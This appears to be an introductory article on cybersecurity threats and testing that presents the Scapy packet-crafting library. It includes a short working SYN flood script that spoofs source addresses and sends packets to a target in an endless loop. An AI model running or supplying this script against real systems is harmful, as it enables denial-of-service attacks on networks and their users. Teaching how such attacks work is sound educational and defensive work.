Cyber attacks are on the rise. Scapy is a powerful and flexible packet crafting all-in-one tool that can help prevent these attacks.
Cyber security is a set of principles and practices that protects computing assets such as computers, networks, databases, mobiles and other devices from attacks. Every device is connected to a network today, and maintaining the confidentiality, integrity and availability of data is of utmost importance.
Confidentiality implies that the data or information should be kept private. Information should be available only to authorised users to reduce the risk of leakage. The aim of attackers is to get information from the system.
Integrity implies preventing the data from getting corrupted. Cyber attacks involve the use of malware to corrupt data, in order to degrade the system.
Availability implies that data and systems should be available to users whenever they want to access them. Cyber attacks involve blocking the access to systems intentionally so that their functioning is disrupted.
Types of cyber threats
As indicated earlier, all the cyber threats attack the confidentiality, integrity and availability of data.
Malware attacks: Malware is malicious software created to attack the systems of the user to access information and corrupt the data. There are different types of malware such as viruses, Trojans, ransomware, spyware, botnets, etc. Malware basically affects the confidentiality and integrity of the asset.
Social engineering attacks: This is a term used when human interactions cause a broad range of malicious activities. Examples of social engineering attacks are:
- Phishing: Here, a malicious actor tries to access the assets of the user with a fraudulent email or link, and gets information when the link is clicked or the email is replied to.
- Spear phishing: This is an attack on targeted individuals or an organisation.
- Whale phishing: This is an attack on high net worth individuals.
Man in the middle attack: In this attack, the malicious actor tries to access the communication between the user and the system. Confidential information is obtained by sniffing on the network.
Denial of service attack: In this type of attack, the malicious actor prevents access to the system, and the computer or server is unable to perform its intended function. This makes the system unusable, affecting its availability.
SQL injection attack: SQL is a database and answers all the queries it receives. The attackers look at vulnerable applications and post queries to get the information from the database.
Password attack: In this type of attack, the hacker tries to guess the passwords of user accounts. There are different types of password attacks.
- Dictionary attack: The attacker tries to use all the words in the dictionary in an attempt to guess the password.
- Brute force attack: The attacker tries to guess the various password combinations possible, through trial and error.
- Keylogger: This attack creates records of everything that is typed on a computer or mobile keyboard.
- Shoulder surfing: In this type of attack, passwords are obtained by looking over the user’s shoulder.
- Distributed denial of service or DDOS attack: Here multiple bots are used to perform denial-of-service attacks on the target. The hacker gets control of the bots and tries to attack the target through them. It is difficult to trace the source of this attack. There are different kinds of DDOS attacks such as volume based attacks, protocol attacks and application layer attacks.
Cyber security testing
Cyber security testing involves uncovering the vulnerabilities and making a risk assessment of the system for cyber attacks. The goal is to find the loopholes and weaknesses of the system.
There are different types of security testing.
Vulnerability scanning: This involves finding the weaknesses of the system through which a hacker can gain unauthorised access to the machine. Various parts of the system such as open ports are checked for vulnerabilities.
Penetration testing: A pen test attacks a system to help find the vulnerabilities in it.
Security auditing: The audit of the system is done to find the security vulnerabilities.
Security risk assessment: In this kind of testing the risks and vulnerabilities in the system are analysed. This involves a process of identifying the security loopholes in the system, analysing the vulnerabilities and addressing them. Historic problems with the system are evaluated from the attacker’s point of view.
Ethical hacking: Ethical hacking is a process of understanding the vulnerabilities in the system, installed applications, networking protocols used and in the databases. It tries to understand the weak points in the system and lawfully attack it to evaluate and resolve its vulnerabilities.
Scapy: The network packet manipulation tool
Now that we know a little about the risks associated with the Internet, we will have a look at Scapy, which is a packet crafting library for Python 2 and Python 3.
Scapy is a powerful packet crafting tool. It can forge or decode the packets of a wide variety of protocols, send them on the Internet, and respond to the replies. It can be used to handle the classical tasks of cyber security such as network scanning, probing, unit tests, performing attacks, network discovery and debugging of network attacks. Scapy can do the following:
- Network scanning
- Network attack
- Automated analysis of pcap files from Wireshark
Cyber security activities
Port scanning: Ports are the doors to the network through which information is received and transmitted. Port scanning determines which ports are open and can receive information, and what services are available from that system.
Network fingerprinting: Network fingerprinting is the process of finding the information on the network device such as the version of the operating system, network protocols, active network services, databases installed, software applications and configuration, and so on. An attacker’s first activity is to find as much information as possible such as the target platform, software application, databases and configuration, network topology and architecture. This information can be used to find vulnerabilities and plan for the attack.
Packet sniffing: In this, hardware or software is used to observe the packets flowing through the network. This could be between two computers or multiple devices on the network. It is also called packet analysis or protocol analysis. Packet sniffers work by intercepting and logging the traffic on the network. The raw packets are analysed to decode their protocol information.
Packet forging: Packet forging is the manipulation of network packets sent to the devices. This is done to take advantage of the vulnerabilities in the software. In packet forging, the protocol header or payload information is manipulated and sent to the device.
After getting the necessary information through port scanning, fingerprinting, and understanding the vulnerabilities of the system, a cyber attack is carried out to disrupt and disable a system.
Advantages of Scapy over other tools
There are a lot of open source tools such as Nmap, Zenmap and Netcat available to perform a port scan. Vulnerability scanning can be done by open source tools such as OpenVAS, Metasploit, etc. Packet sniffing can be done by tools like Wireshark. But all these activities are possible with Scapy.
Scapy is a tool with which you can craft your own packets, send them on the network, receive the responses from the network and analyse them. Other tools like Nmap are made for specific functions and cannot do much more than that but Scapy, being a packet crafting program, is very flexible. With Scapy you can manipulate and make the packets you want to send. It is also possible to programmatically analyse the packets and get the information that is required.
Downloading and installing Scapy
We can download Scapy from https://scapy.net/download/ and install it with the following command:
$pip install --pre scapy[basic]
This command installs the Python shell along with Scapy. There are other commands we can use. To install only scapy, type:
$pip install scapy
If you want to install Scapy with all the dependencies, write the following code:
$pip install –pre scapy[complete]
Scapy interactive mode: In this mode, the Scapy commands are run from the terminal. This is good for the one-line commands. This is just a Python interpreter loaded with Scapy classes and objects.
Importing Scapy as a module: In this mode, Scapy is imported as a module and used in Python. This is used for programmatically manipulating the packets.
Cyber attacks using Scapy
The small program given below demonstrates the SYN flood attack using Scapy:
from scapy.all import * #IP Address of the target under attack ip_target = “192.168.1.11” #Port of the target port_target = 55555 #Spoof IP adress ip = IP(src=RandIP(“192.168.1.1/24”), dst=ip_target) #Prepare TCP SYN packet tcp = TCP(sport=RandShort(), dport=port_target, flags=”S”) raw = Raw(b”X”*1024) # stack up the layers p = ip / tcp / raw # send the constructed packet in a loop until CTRL+C is detected send(p, loop=1, verbose=0)
Network scanning using Scapy module
The process of scanning the whole network and trying to find out all the clients that are connected to it is known as network scanning. We can identify clients using their IP and MAC addresses. ARP ping can be used to find out the ‘live’ systems in the network.
Scapy provides a Python interface with libpcap or native raw sockets, similar to the way Wireshark provides a view and captures GUI. With an understanding of the types of attacks and the ways to mitigate them, I leave it to you to try out Scapy and check further use cases. For more details, you can visit https://scapy.net/ and read the documentation.